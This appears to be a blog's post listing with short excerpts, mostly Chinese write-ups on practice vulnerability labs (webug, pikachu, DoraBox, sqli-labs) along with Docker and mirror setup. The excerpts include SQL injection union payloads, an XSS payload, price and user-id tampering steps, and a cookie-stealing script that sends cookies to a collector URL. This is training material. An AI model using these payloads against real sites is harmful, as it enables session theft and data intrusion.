- 博客(10)
- 资源 (1)
- 收藏
- 关注
原创 kali下安装whatwaf
git clone https://github.com/ekultek/whatwaf.gitcd whatwafpip install -r requirements.txtpython setup.pyecho "root" | python setup.py install
2020-09-16 11:12:01 1073
原创 centos配置阿里源以及安装docker、docker-compose
配置阿里源下载源安装wgetyum install -y wget下载CentOS 7的repo文件wget -O /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo或者curl -o /etc/yum.repos.d/CentOS-Base.repo http://mirrors.aliyun.com/repo/Centos-7.repo更新镜像源清除缓存:yum c
2020-09-07 10:41:18 314
原创 阿里云docker镜像加速配置
阿里云docker镜像加速https://account.aliyun.com/login/login.htm,登录阿里云先获取个人镜像加速器地址针对Docker客户端版本大于 1.10.0 的用户安装完docker后,您可以通过修改daemon配置文件/etc/docker/daemon.json来使用加速器sudo vim /etc/docker/daemon.json{ "registry-mirrors": ["https://xxxxxxxx.mirror.aliyuncs.com
2020-09-04 19:23:20 213
原创 webug靶场逻辑漏洞篇
越权修改密码先用admin登录,直接得到一个修改密码的界面尝试修改admin的密码,用burpsuite拦截流量包,可以看到URI中有id值,猜测这可能是验证用户身份的一个手段,因为这里我们知道库中有两个用户,将id修改为2,新密码改为我们要的密码在burpsuite中进行修改密码,去数据库中查看,发现用户id为2的用户密码以及更改。支付漏洞抓取购买商品的流量包,可以看到price应该是商品价格的参数,这里我尝试将100改为-1,发现我们以-1购买了商品,这样我们就可以用任意价格购买商品。
2020-08-27 12:37:31 1296
原创 webug靶场任意文件下载篇
任意文件下载查看下载的元素信息,发现file函数进行下载文件的,于是将href加入到url后发现,弹出下载文件的框,这样我们就可以下载服务端任意文件这里我知道目录下有一个1.png文件发现可以进行下载mysql配置文件下载由于我用的是wamp,所以配置文件的位置有点不同这里我是知道配置文件的位置,所以就直接用了这个路径file=…/…/bin/mysql/mysql5.6.17/my.ini,在实战中更多的可能需要自己去猜了,经验的积累。文件上传(前端拦截)先把php脚本的后缀名改成允许
2020-08-26 18:59:45 426
原创 webug靶场xss篇
反射型xss首先观察了一下页面,并没有发现输入点,但是经过我敏锐的观察力发现url中id的值输出到了页面中,果不其然漏洞就在这,直接插入xss代码。
2020-08-26 15:35:22 438
原创 webug靶场注入篇
注入显错注入单引号报错,构造闭合,payload' and 1=1--+与 ' and 1=2,页面返回的信息不一致,由此还可以判断出存在注入,用order by查出字段数为二,union 联合查询找到回显点位置,带入select语句查询。查询所有的库名payload:-1' union select 1,group_concat(schema_name) from information_schema.schemata --+,这里查出来的库有一些我在本地搭建环境中其他的库,其中informatio
2020-08-26 11:03:21 849
原创 dorabox靶场writeup
靶场搭建这里我直接采用Windows下的wamp集成环境,直接将靶场源码下载到本地,解压到网站根目录即可。网站源码下载地址:https://github.com/Acmesec/DoraBox数据库的配置,修改conn.php的数据库连接账号及密码,在本地数据库创建一个pentest数据库,将pentest.sql文件导入到数据库中,在创建的库中执行source D:/wamp/www/DoraBox-master/pentest.sql即可,到这里靶场就搭建完毕。作者也在github上有制作了do
2020-08-22 11:14:08 1190
原创 pikachu靶场之反射型XSS(cookie盗取)
反射型XSS尝试payload发现存在字符长度现在,使用F12查看元素,把maxlength属性改为足够长。使用最简单的payload:<script>alert('xss')</script>,出现弹窗,说明存在漏洞。利用漏洞获取cookie实例操作这里我们用的例子是post型,get型利用容易被受害者察觉,因为get型只能在url中插入<script> document.location = 'http://127.0.0.1/pkxss/xcookie/coo
2020-08-20 11:29:36 2000
原创 使用wamp环境搭建sql-libs
1.首先下载wamp附上百度网盘链接,也可以去官网下载链接:https://pan.baidu.com/s/1gMiT94AbIqDfwrVHRPouoQ提取码:h1u22.安装wamp直接点下一步选择路径,最好不要选C盘,之后如果要保存项目的话会占用很大的内存接下来点下一步就行finish之后任务栏的这个图标为绿色说明环境已经启动了,若为橙色表示还未完全开启,若显示红色表示未开启...
2020-04-05 16:48:19 633
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人